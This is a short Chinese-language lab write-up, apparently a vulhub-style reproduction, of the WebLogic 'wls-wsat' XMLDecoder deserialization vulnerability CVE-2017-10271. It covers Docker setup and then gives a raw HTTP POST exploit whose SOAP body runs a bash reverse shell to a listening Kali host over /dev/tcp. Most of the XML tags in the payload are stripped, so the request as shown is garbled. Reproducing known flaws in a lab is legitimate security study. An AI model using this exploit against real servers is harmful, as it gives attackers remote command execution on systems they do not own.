Weblogic--CVE-2017-10271

Weblogic < 10.3.6 ‘wls-wsat’ XMLDecoder 反序列化漏洞（CVE-2017-10271）

Weblogic的WLS Security组件对外提供webservice服务，其中使用了XMLDecoder来解析用户传入的XML数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。

环境搭建

启动测试环境：

docker-compose up -d

等待一段时间，访问http://your-ip:7001/即可看到一个404页面，说明weblogic已成功启动。

漏洞复现

发送如下数据包（注意其中反弹shell的语句，需要进行编码，否则解析XML的时候将出现格式错误）：

漏洞检测

漏洞利用，反弹shell
在kali监听

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.88.148:7001
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 637

soapenv:Header





/bin/bash


-c


bash -i >& /dev/tcp/192.168.88.141/7788 0>&1






soapenv:Body/

Bp抓包

Kali接受shell